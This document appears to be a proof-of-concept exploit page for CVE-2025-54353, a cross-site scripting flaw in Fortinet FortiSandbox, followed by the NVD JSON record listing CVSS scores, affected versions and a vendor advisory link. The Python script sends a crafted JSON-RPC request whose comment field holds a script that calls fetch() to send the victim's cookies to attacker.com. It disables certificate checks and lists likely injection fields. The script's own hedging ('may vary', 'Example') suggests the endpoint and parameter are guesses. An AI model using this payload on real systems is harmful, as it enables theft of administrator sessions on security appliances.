CVE-2025-54353

import requests import urllib.parse # CVE-2025-54353 PoC - FortiSandbox XSS # Target: FortiSandbox versions 4.0-4.2, 4.4.0-4.4.7, 5.0.0-5.0.2 TARGET_URL = "https://<fortisandbox-ip>/jsonrpc" # XSS payload - Cookie stealing example xss_payload = '<script>fetch("https://attacker.com/steal?c="+document.cookie)</script>' def exploit_xss(): """ Inject XSS payload into FortiSandbox via crafted HTTP request The vulnerable parameter may vary - common targets include: - job comments/descriptions - analysis submission notes - report titles """ headers = { 'Content-Type': 'application/json', 'Authorization': 'Bearer <session-token>' } # Example JSON-RPC request structure payload = { "method": "submit-analysis", "params": { "url": "http://malicious-site.com", "comment": xss_payload # XSS injection point }, "jsonrpc": "2.0" } try: response = requests.post( TARGET_URL, json=payload, headers=headers, verify=False, timeout=10 ) print(f"Response: {response.status_code}") return response.json() except requests.exceptions.RequestException as e: print(f"Error: {e}") return None if __name__ == "__main__": print("CVE-2025-54353 PoC - FortiSandbox XSS") exploit_xss()

{"cve": {"id": "CVE-2025-54353", "sourceIdentifier": "[email protected]", "published": "2025-12-09T18:15:53.973", "lastModified": "2025-12-09T20:10:23.677", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability [CWE-79] vulnerability in Fortinet FortiSandbox 5.0.0 through 5.0.2, FortiSandbox 4.4.0 through 4.4.7, FortiSandbox 4.2 all versions, FortiSandbox 4.0 all versions may allow an attacker to perform an XSS attack via crafted HTTP requests."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.5}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:fortinet:fortisandbox:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.0.0", "versionEndIncluding": "4.0.6", "matchCriteriaId": "6AD9ECD5-FE5A-4772-A53A-04769828A110"}, {"vulnerable": true, "criteria": "cpe:2.3:a:fortinet:fortisandbox:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.2.0", "versionEndIncluding": "4.2.8", "matchCriteriaId": "814D77BE-F536-42DE-B068-F92B95D68248"}, {"vulnerable": true, "criteria": "cpe:2.3:a:fortinet:fortisandbox:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.4.0", "versionEndIncluding": "4.4.7", "matchCriteriaId": "08D2984D-3F90-42A6-9DC9-5E853E7B3188"}, {"vulnerable": true, "criteria": "cpe:2.3:a:fortinet:fortisandbox:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.0.0", "versionEndIncluding": "5.0.2", "matchCriteriaId": "C5335FAF-6569-44CE-8634-0991C738CCF9"}]}]}], "references": [{"url": "https://fortiguard.fortinet.com/psirt/FG-IR-25-477", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}